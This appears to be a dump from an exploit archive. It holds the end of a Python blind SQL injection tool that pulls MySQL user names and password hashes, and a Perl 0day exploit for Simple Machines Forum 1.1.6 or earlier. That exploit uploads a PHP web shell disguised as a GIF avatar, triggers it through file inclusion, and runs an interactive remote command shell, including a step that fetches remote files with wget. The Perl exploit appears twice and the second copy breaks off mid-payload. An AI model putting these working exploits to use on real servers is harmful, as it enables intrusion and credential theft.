check = error.read()
except socket.error:
print "(-) Proxy connection failed"
sys.exit(1)
else:
try:
check = urllib.urlopen(options.target+options.directory+exploit).read()
except urllib.error.HTTPError, error:
check = error.read()
except urllib.error.URLError:
print "(-) Target connection failed, check your address"
sys.exit(1)
return check
# modified version of rsauron's function
# thanks bro.
def getAsciiValue(URI):
lower = lower_value
upper = upper_value
while lower < upper:
try:
mid = (lower + upper) / 2
head_URI = URI + ">"+str(mid)
result = getServerResponse(head_URI)
match = re.findall(options.trueStr,result)
if len(match) >= 1:
lower = mid + 1
else:
upper = mid
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
if lower > lower_value and lower < upper_value:
value = lower
else:
head_URI = URI + "="+str(lower)
result = getServerResponse(head_URI)
match = re.findall(options.trueStr,result)
if len(match) >= 1:
value = lower
else:
print "(-) READ xprog's blind sql tutorial!\n"
sys.exit(1)
return value
def doBlindSqlInjection():
print "(+) Using string '%s' for the true page" % (options.trueStr)
print "(+) This will take time, go grab a coffee.."
for key in basicInfo:
sys.stdout.write("\n(!) Getting database %s: " % (key))
sys.stdout.flush()
# it will never go through all 100 iterations
for i in range(1,100):
request = (vuluri+"+or+ascii(substring(%s,%s,1))" % (basicInfo[key],str(i)))
asciival = getAsciiValue(request)
if asciival != 0:
sys.stdout.write("%s" % (chr(asciival)))
sys.stdout.flush()
else:
break
isMysqlUser = (vuluri+"+or+(select 1 from mysql.user limit 0,1)=1")
result = getServerResponse(isMysqlUser)
match = re.findall(options.trueStr,result)
if len(match) >= 1:
print "\n(!) w00t! You have access to MySQL database!"
print "(+) Dumping hashs hold onto your knickers.."
sys.stdout.write("(+) The username and hashed password is: ")
sys.stdout.flush()
for k in range(1,100):
getMysqlUserAndPass = (vuluri+"+or+ascii(substring((SELECT+concat(user,0x3a,password)+from+"
"mysql.user+limit+0,1),%s,1))" % str(k))
asciival = getAsciiValue(getMysqlUserAndPass)
if asciival != 0:
sys.stdout.write("%s" % (chr(asciival)))
sys.stdout.flush()
else:
break
else:
print "\n(-) You do not have access to MySQL database"
if __name__ == "__main__":
banner()
options.target = setTargetHTTP()
print "(+) Exploiting target @: %s" % (options.target+options.directory)
if options.proxy:
print "(+) Testing Proxy @ %s.." % (options.proxy)
opener = getProxy()
try:
check = opener.open("http://www.google.com").read()
except:
check = 0
pass
if check >= 1:
print "(+) Proxy is working!"
else:
print "(-) Proxy failed, exiting.."
sys.exit(1)
doBlindSqlInjection()
print "\n(+) PoC finished."
~elmysterio/Simple Machines Forum <= 1.1.6 (LFI) Code Execution Exploit ( php)
#!/usr/bin/perl
#
# @title: Simple Machines Forum Code Execution
# @versn: * <= 1.1.6
# @authr: ~elmysterio ( a.k.a us )
# @stats: DROPPED!!!!!!!
# @descp: In loving memory of the rare bone marrow disease that killed rgod.
# We can't thank you enough for killing a bug killer.
# @bug : Sources/QueryString.php & Sources/Themes.php w/ magic_quotes == Off
# @gr33t: m0rt's failure, it never stops.
#
# C:\Documents and Settings\molest>perl P:\advisories\smf\smf_localfileinclude.pl
# -s http://localhost/audit/smf116 -u regular -p test -d
# [ii] 0day Simple Machines Forum <= 1.1.6 Code Execution
# [ii] Session ID = e6abb52c4dc7fd4ecd7b307f66e9cd9d
# [ii] User Id = 2
# [ii] Uploaded a shell...
# [cmd@win32]$ ver
#
# Microsoft Windows XP [Version 5.1.2600]
#
# [cmd@win32]$
#
# FOR LULZ PURPOSE ONLY!!
#
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Long qw(:config no_ignore_case);
print "[ii] 0day Simple Machines Forum <= 1.1.6 Code Execution\n";
my $ua = LWP::UserAgent->new( cookie_jar => {}, agent => "Mozilla FireFox" );
my %parms = ( s => "",
d => 0,
x => sub { print "[**] Proxy found, using $_[1]\n"; $ua->proxy(['http'], $_[1]); },
u => "Gl0ria!!!",
p => "gl0ria\@herb3st" );
GetOptions \%parms, "s=s", "d", "x=s", "u=s", "p=s";
if( !$parms{s} ) {
die <<HELP
[ii] usage: $0 <parms>
[-s] Site -> http://site.com/forums
[-x] Proxy -> localhost:8118
[-u] Username -> Gl0ria!!!
[-p] Password -> gl0ria\@herb3st
[-d] Debug
HELP
}
my $shell = chr(0x47).chr(0x49).chr(0x46).chr(0x38).chr(0x39).chr(0x61).
chr(0x01).chr(0x00).chr(0x01).chr(0x00).chr(0xf7).chr(0x00).
chr(0x00).chr(0xa4).chr(0xb6).chr(0xa4).chr(0x16).chr(0x00).
chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
chr(0x00).chr(0x6b).chr(0x00).chr(0x4c).chr(0x15).chr(0x00).
chr(0x00).chr(0xf4).chr(0x00).chr(0x69).chr(0x77).chr(0x00).
chr(0x00).chr(0xf8).chr(0x00).chr(0x6e).chr(0x62).chr(0x00).
chr(0x00).chr(0x15).chr(0x00).chr(0x67).chr(0x00).chr(0x00).
chr(0x00).chr(0x34).chr(0x00).chr(0x75).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x61).chr(0xc0).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x89).chr(0x00).chr(0x00).chr(0x1c).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0xa9).chr(0x00).chr(0x00).chr(0x20).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x6f).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x56).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00); $shell .= <<'EXIF';
<?php
error_reporting(0);ini_set('max_execution_time',0);
$x=trim(stripslashes($_SERVER[HTTP_SERVER_INFO]));$z=(ini_get('safe_mode') or strpos(ini_get('disable_functions'),'passthru') ? '1' : '0');
if($x=='0998'){print '---info---'.PHP_OS.';'.$z.'---info---';exit;}
print '---1243---';if($z){print eval($x);}else{print passthru($x);}print '---3421---';exit;
?>
EXIF
$shell .= chr(0x38).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).
chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x98).chr(0x01).chr(0x00).
chr(0xcc).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
chr(0x00).chr(0x58).chr(0x00).chr(0x10).chr(0xe6).chr(0x00).
chr(0x04).chr(0x12).chr(0x00).chr(0x10).chr(0x00).chr(0x00).
chr(0x04).chr(0x05).chr(0x00).chr(0x01).chr(0x90).chr(0x00).
chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
chr(0x00).chr(0xc8).chr(0x00).chr(0x10).chr(0xd5).chr(0x00).
chr(0xe8).chr(0xf5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
chr(0x00).chr(0xff).chr(0x00).chr(0x13).chr(0xff).chr(0x00).
chr(0x6c).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
chr(0x74).chr(0x6a).chr(0x00).chr(0x03).chr(0x16).chr(0x00).
chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
chr(0x00).chr(0xc4).chr(0x00).chr(0x30).chr(0x1e).chr(0x00).
chr(0x75).chr(0xe5).chr(0x00).chr(0x15).chr(0x77).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x15).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0xdc).chr(0x00).chr(0x00).
chr(0xe7).chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
chr(0x00).chr(0x70).chr(0x00).chr(0x01).chr(0x59).chr(0x00).
chr(0x00).chr(0x18).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x04).chr(0x00).chr(0x88).chr(0x01).chr(0x00).
chr(0xe8).chr(0x05).chr(0x00).chr(0x12).chr(0x01).chr(0x00).
chr(0x00).chr(0x6c).chr(0x00).chr(0x04).chr(0xe3).chr(0x00).
chr(0x42).chr(0x12).chr(0x00).chr(0x6e).chr(0x00).chr(0x00).
chr(0x74).chr(0x7e).chr(0x00).chr(0x30).chr(0x00).chr(0x00).
chr(0x87).chr(0x00).chr(0x00).chr(0x6e).chr(0xc0).chr(0x00).
chr(0x74).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
chr(0xff).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
chr(0xff).chr(0xff).chr(0x00).chr(0xd6).chr(0xff).chr(0x00).
chr(0x32).chr(0xff).chr(0x00).chr(0x6e).chr(0xff).chr(0x00).
chr(0x74).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
chr(0x5b).chr(0xff).chr(0x00).chr(0xe5).chr(0xff).chr(0x00).
chr(0x77).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
chr(0x15).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x07).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x6b).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x58).chr(0x00).chr(0x00).chr(0x03).chr(0x00).
chr(0xf0).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
chr(0x00).chr(0x06).chr(0x00).chr(0x00).chr(0xf6).chr(0x00).
chr(0x00).chr(0xe4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
chr(0x00).chr(0x0f).chr(0x00).chr(0x00).chr(0x1e).chr(0x00).
chr(0x00).chr(0xe5).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0xf8).chr(0x74).chr(0x00).chr(0x62).chr(0xe7).
chr(0x00).chr(0x01).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0xc8).chr(0x68).chr(0x00).chr(0x28).
chr(0x32).chr(0x15).chr(0xe5).chr(0xe6).chr(0x00).chr(0x77).
chr(0x77).chr(0xa4).chr(0x00).chr(0xff).chr(0xe5).chr(0x00).
chr(0xff).chr(0x12).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
chr(0xff).chr(0x00).chr(0x00).chr(0x6c).chr(0x00).chr(0x00).
chr(0x5b).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
chr(0x77).chr(0xfc).chr(0xf8).chr(0x36).chr(0xf7).chr(0x62).
chr(0x00).chr(0x12).chr(0x15).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x05).chr(0x00).chr(0x36).chr(0x90).chr(0x01).
chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
chr(0x00).chr(0xc8).chr(0x04).chr(0xd8).chr(0xd5).chr(0x29).
chr(0xed).chr(0xf5).chr(0xe5).chr(0x12).chr(0x77).chr(0x77).
chr(0x00).chr(0xff).chr(0x94).chr(0xff).chr(0xff).chr(0xe7).
chr(0xff).chr(0xff).chr(0x12).chr(0xff).chr(0xff).chr(0x00).
chr(0xff).chr(0x6a).chr(0x64).chr(0x00).chr(0x16).chr(0x2f).
chr(0x00).chr(0xf4).chr(0xe6).chr(0x00).chr(0x77).chr(0x77).
chr(0x00).chr(0xe0).chr(0x00).chr(0x9c).chr(0x18).chr(0x00).
chr(0xe8).chr(0xe5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
chr(0x00).chr(0x00).chr(0xff).chr(0x4e).chr(0x00).chr(0xff).
chr(0x21).chr(0x15).chr(0xff).chr(0x4c).chr(0x00).chr(0xff).
chr(0x00).chr(0x00).chr(0x6f).chr(0x7c).chr(0x00).chr(0x10).
chr(0xe8).chr(0x00).chr(0xe5).chr(0x12).chr(0x00).chr(0x77).
chr(0x00).chr(0xf8).chr(0x00).chr(0x7b).chr(0x62).chr(0x00).
chr(0xe0).chr(0x15).chr(0x00).chr(0x4e).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x98).chr(0xb0).chr(0x01).chr(0xe8).
chr(0xe8).chr(0x00).chr(0x12).chr(0x12).chr(0x00).chr(0x00).
chr(0x00).chr(0x64).chr(0x98).chr(0x6f).chr(0x2f).chr(0x10).
chr(0x10).chr(0xe6).chr(0xe5).chr(0xe5).chr(0x77).chr(0x77).
chr(0x77).chr(0x00).chr(0x10).chr(0x52).chr(0x00).chr(0xe4).
chr(0xe9).chr(0x00).chr(0x4e).chr(0x12).chr(0x00).chr(0x00).
chr(0x00).chr(0x61).chr(0x20).chr(0xc8).chr(0x00).chr(0x02).
chr(0xff).chr(0x6c).chr(0x4f).chr(0xff).chr(0x00).chr(0x00).
chr(0x7f).chr(0x69).chr(0x00).chr(0x1c).chr(0x00).chr(0x01).
chr(0xe9).chr(0x61).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
chr(0x00).chr(0x29).chr(0x94).chr(0x00).chr(0x00).chr(0xe7).
chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x6f).chr(0x00).chr(0x01).
chr(0x10).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
chr(0x77).chr(0x00).chr(0xa0).chr(0x00).chr(0x00).chr(0x3a).
chr(0x00).chr(0x00).chr(0x50).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x30).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x69).
chr(0x00).chr(0x00).chr(0x61).chr(0x60).chr(0x00).chr(0x74).
chr(0xf1).chr(0x00).chr(0x74).chr(0x15).chr(0x00).chr(0x69).
chr(0x00).chr(0x00).chr(0x00).chr(0xf0).chr(0x00).chr(0x00).
chr(0xaa).chr(0x00).chr(0x02).chr(0x47).chr(0x00).chr(0x00).
chr(0x00).chr(0x21).chr(0xf9).chr(0x04).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x2c).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x01).chr(0x00).
chr(0x07).chr(0x08).chr(0x04).chr(0x00).chr(0x01).chr(0x04).
chr(0x04).chr(0x00).chr(0x3b).chr(0x00);
## Logging in
my $ret = $ua->post("$parms{s}/index.php?action=login2",
[
user => $parms{u},
passwrd => $parms{p},
cookielength => -1
]);
## Getting id, sid and checking to see if we're logged on
$ret = $ua->get("$parms{s}/index.php?action=profile");
die "[!!] Wrong username/password\n"
unless $ret->as_string !~ /The user whose profile you are trying to view does not exist/;
die "[!!] Error getting session id\n"
unless my($sid) = $ret->as_string =~ /sesc=([a-z0-9]{32})/;
die "[!!] Error getting id\n"
unless my($id) = $ret->as_string =~ /u=(\d+);/;
print "[ii] Session ID = $sid\n".
"[ii] User Id = $id\n" if $parms{d};
## Checking for shell
$ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => "echo expl0ited");
&shell
if $ret->as_string =~ /expl0ited/;
$ret = $ua->request(
POST "$parms{s}/index.php?action=profile2",
Content_Type => 'multipart/form-data',
Content =>
[
avatar_choice => "upload",
sc => $sid,
userID => $id,
sa => "forumProfile",
attachment =>
[
undef,
"expl0ited.gif",
Content => $shell,
"Content-Type" => "image/gif"
]
]);
## Updating Settings.php
$ret = $ua->get("$parms{s}/index.php?action=jsoption;sesc=${sid};th=32;var=theme_dir;val=./attachments/avatar_${id}.gif\%2500");
print "[ii] Uploaded a shell...\n"
if $parms{d};
shell();
## lulz @ this shit.
sub shell {
my ($full,$base,$user,$pass,$file,$cmd,$os,$sh);
$ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => '0998' );
($os,$sh) = $ret->as_string =~ /---info---(.*?);(\d?)---info---/s;
die "[!!] magic_quotes is turned on\n"
if (not defined $os or not defined $sh or $1 eq $id);
$sh = $sh ? "php" : "cmd";
$os = $os =~ /win/i ? "win32" : "unix";
do {
print "[$sh\@$os]\$ ";
$cmd = chomp (my $cmd = <STDIN>);
exit
unless $cmd !~ /^exit$/i;
if( ($file) = $cmd =~ /^savefile (.*?) / ) {
$cmd =~ s/savefile $1 //;
} else { undef $file; }
if( ($user,$pass,$full) = $cmd =~ /^mysql (.*?) (.*?) (.*?)$/ ) {
($base) = $full =~ /\/(.*?)$/;
$cmd = "cd attachments;wget $full; mysql --user=$user --password=$pass < $base; rm $base;";
}
$ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => $cmd);
$ret->as_string =~ /---1243---(.*?)---3421---/s;
print "$1\n";
if( defined $file ) {
open FILE, ">>", $file or die "[!!] Error writing to file; $!\n";
print FILE "Command Executed: $cmd\n".
"Host: $parms{s}\n$1\n";
close FILE;
}
} while( $cmd !~ /^exit$/i );
exit;
}
# milw0rm.com [2008-11-05]
~elmysterio/smf-lfiexec.txt ( na)
#!/usr/bin/perl
#
# @title: Simple Machines Forum Code Execution
# @versn: * <= 1.1.6
# @authr: ~elmysterio ( a.k.a us )
# @stats: DROPPED!!!!!!!
# @descp: In loving memory of the rare bone marrow disease that killed rgod.
# We can't thank you enough for killing a bug killer.
# @bug : Sources/QueryString.php & Sources/Themes.php w/ magic_quotes == Off
# @gr33t: m0rt's failure, it never stops.
#
# C:\Documents and Settings\molest>perl P:\advisories\smf\smf_localfileinclude.pl
# -s http://localhost/audit/smf116 -u regular -p test -d
# [ii] 0day Simple Machines Forum <= 1.1.6 Code Execution
# [ii] Session ID = e6abb52c4dc7fd4ecd7b307f66e9cd9d
# [ii] User Id = 2
# [ii] Uploaded a shell...
# [cmd@win32]$ ver
#
# Microsoft Windows XP [Version 5.1.2600]
#
# [cmd@win32]$
#
# FOR LULZ PURPOSE ONLY!!
#
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Long qw(:config no_ignore_case);
print "[ii] 0day Simple Machines Forum <= 1.1.6 Code Execution\n";
my $ua = LWP::UserAgent->new( cookie_jar => {}, agent => "Mozilla FireFox" );
my %parms = ( s => "",
d => 0,
x => sub { print "[**] Proxy found, using $_[1]\n"; $ua->proxy(['http'], $_[1]); },
u => "Gl0ria!!!",
p => "gl0ria\@herb3st" );
GetOptions \%parms, "s=s", "d", "x=s", "u=s", "p=s";
if( !$parms{s} ) {
die <<HELP
[ii] usage: $0 <parms>
[-s] Site -> http://site.com/forums
[-x] Proxy -> localhost:8118
[-u] Username -> Gl0ria!!!
[-p] Password -> gl0ria\@herb3st
[-d] Debug
HELP
}
my $shell = chr(0x47).chr(0x49).chr(0x46).chr(0x38).chr(0x39).chr(0x61).
chr(0x01).chr(0x00).chr(0x01).chr(0x00).chr(0xf7).chr(0x00).
chr(0x00).chr(0xa4).chr(0xb6).chr(0xa4).chr(0x16).chr(0x00).
chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
chr(0x00).chr(0x6b).chr(0x00).chr(0x4c).chr(0x15).chr(0x00).
chr(0x00).chr(0xf4).chr(0x00).chr(0x69).chr(0x77).chr(0x00).
chr(0x00).chr(0xf8).chr(0x00).chr(0x6e).chr(0x62).chr(0x00).
chr(0x00).chr(0x15).chr(0x00).chr(0x67).chr(0x00).chr(0x00).
chr(0x00).chr(0x34).chr(0x00).chr(0x75).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x61).chr(0xc0).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x89).chr(0x00).chr(0x00).chr(0x1c).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0xa9).chr(0x00).chr(0x00).chr(0x20).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x6f).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x56).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00); $shell .= <<'EXIF';
<?php
error_reporting(0);ini_set('max_execution_time',0);
$x=trim(stripslashes($_SERVER[HTTP_SERVER_INFO]));$z=(ini_get('safe_mode') or strpos(ini_get('disable_functions'),'passthru') ? '1' : '0');
if($x=='0998'){print '---info---'.PHP_OS.';'.$z.'---info---';exit;}
print '---1243---';if($z){print eval($x);}else{print passthru($x);}print '---3421---';exit;
?>
EXIF
$shell .= chr(0x38).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).
chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x98).chr(0x01).chr(0x00).
chr(0xcc).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
chr(0x00).chr(0x58).chr(0x00).chr(0x10).chr(0xe6).chr(0x00).
chr(0x04).chr(0x12).chr(0x00).chr(0x10).chr(0x00).chr(0x00).
chr(0x04).chr(0x05).chr(0x00).chr(0x01).chr(0x90).chr(0x00).
chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
chr(0x00).chr(0xc8).chr(0x00).chr(0x10).chr(0xd5).chr(0x00).
chr(0xe8).chr(0xf5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
chr(0x00).chr(0xff).chr(0x00).chr(0x13).chr(0xff).chr(0x00).
chr(0x6c).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
chr(0x74).chr(0x6a).chr(0x00).chr(0x03).chr(0x16).chr(0x00).
chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
chr(0x00).chr(0xc4).chr(0x00).chr(0x30).chr(0x1e).chr(0x00).
chr(0x75).chr(0xe5).chr(0x00).chr(0x15).chr(0x77).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x15).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0xdc).chr(0x00).chr(0x00).
chr(0xe7).chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
chr(0x00).chr(0x70).chr(0x00).chr(0x01).chr(0x59).chr(0x00).
chr(0x00).chr(0x18).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x04).chr(0x00).chr(0x88).chr(0x01).chr(0x00).
chr(0xe8).chr(0x05).chr(0x00).chr(0x12).chr(0x01).chr(0x00).
chr(0x00).chr(0x6c).chr(0x00).chr(0x04).chr(0xe3).chr(0x00).
chr(0x42).chr(0x12).chr(0x00).chr(0x6e).chr(0x00).chr(0x00).
chr(0x74).chr(0x7e).chr(0x00).chr(0x30).chr(0x00).chr(0x00).
chr(0x87).chr(0x00).chr(0x00).chr(0x6e).chr(0xc0).chr(0x00).
chr(0x74).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
chr(0xff).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
chr(0xff).chr(0xff).chr(0x00).chr(0xd6).chr(0xff).chr(0x00).
chr(0x32).chr(0xff).chr(0x00).chr(0x6e).chr(0xff).chr(0x00).
chr(0x74).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
chr(0x5b).chr(0xff).chr(0x00).chr(0xe5).chr(0xff).chr(0x00).
chr(0x77).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
chr(0x15).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x07).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x6b).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x58).chr(0x00).chr(0x00).chr(0x03).chr(0x00).
chr(0xf0).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
chr(0x00).chr(0x06).chr(0x00).chr(0x00).chr(0xf6).chr(0x00).
chr(0x00).chr(0xe4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
chr(0x00).chr(0x0f).chr(0x00).chr(0x00).chr(0x1e).chr(0x00).
chr(0x00).chr(0xe5).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0xf8).chr(0x74).chr(0x00).chr(0x62).chr(0xe7).
chr(0x00).chr(0x01).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0xc8).chr(0x68).chr(0x00).chr(0x28).
chr(0x32).chr(0x15).chr(0xe5).chr(0xe6).chr(0x00).chr(0x77).
chr(0x77).chr(0xa4).chr(0x00).chr(0xff).chr(0xe5).chr(0x00).
chr(0xff).chr(0x12).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
chr(0xff).chr(0x00).chr(0x00).chr(0x6c).chr(0x00).chr(0x00).
chr(0x5b).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
chr(0x77).chr(0xfc).chr(0xf8).chr(0x36).chr(0xf7).chr(0x62).
chr(0x00).chr(0x12).chr(0x15).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x05).chr(0x00).chr(0x36).chr(0x90).chr(0x01).
chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
chr(0x00).chr(0xc8).chr(0x04).chr(0xd8).chr(0xd5).chr(0x29).
chr(0xed).chr(0xf5).chr(0xe5).chr(0x12).chr(0x77).chr(0x77).
chr(0x00).chr(0xff).chr(0x94).chr(0xff).chr(0xff).chr(0xe7).
chr(0xff).chr(0xff).chr(0x12).chr(0xff).chr(0xff).chr(0x00).
chr(0xff).chr(0x6a).chr(0x64).chr(0x00).chr(0x16).chr(0x2f).
chr(0x00).chr(0xf4).chr(0xe6).chr(0x00).chr(0x77).chr(0x77).
chr(0x00).chr(0xe0).chr(0x00).chr(0x9c).chr(0x18).chr(0x00).
chr(0xe8).chr(0xe5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
chr(0x00).chr(0x00).chr(0xff).chr(0x4e).chr(0x00).chr(0xff).
chr(0x21).chr(0x15).chr(0xff).chr(0x4c).chr(0x00).chr(0xff).
chr(0x00).chr(0x00).chr(0x6f).chr(0x7c).chr(0x00).chr(0x10).
chr(0xe8).chr(0x00).chr(0xe5).chr(0x12).chr(0x00).chr(0x77).
chr(0x00).chr(0xf8).chr(0x00).chr(0x7b).chr(0x62).chr(0x00).
chr(0xe0).chr(0x15).chr(0x00).chr(0x4e).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x98).chr(0xb0).chr(0x01).chr(0xe8).
chr(0xe8).chr(0x00).chr(0x12).chr(0x12).chr(0x00).chr(0x00).
chr(0x00).chr(0x64).chr(0x98).chr(0x6f).chr(0x2f).chr(0x10).
chr(0x10).chr(0xe6).chr(0xe5).chr(0xe5).chr(0x77).chr(0x77).
chr(0x77).chr(0x00).chr(0x10).chr(0x52).chr(0x00).chr(0xe4).
chr(0xe9).chr(0x00).chr(0x4e).chr(0x12).chr(0x00).chr(0x00).
chr(0x00).chr(0x61).chr(0x20).chr(0xc8).chr(0x00).chr(0x02).
chr(0xff).chr(0x6c).chr(0x4f).chr(0xff).chr(0x00).chr(0x00).
chr(0x7f).chr(0x69).chr(0x00).chr(0x1c).chr(0x00).chr(0x01).
chr(0xe9).chr(0x61).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
chr(0x00).chr(0x29).chr(0x94).chr(0x00).chr(0x00).chr(0xe7).
chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x6f).chr(0x00).chr(0x01).
chr(0x10).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
chr(0x77).chr(0x00).chr(0xa0).chr(0x00).chr(0x00).chr(0x3a).
chr(0x00).chr(0x00).chr(0x50).chr(0x00).chr(0x00).chr(0x00).
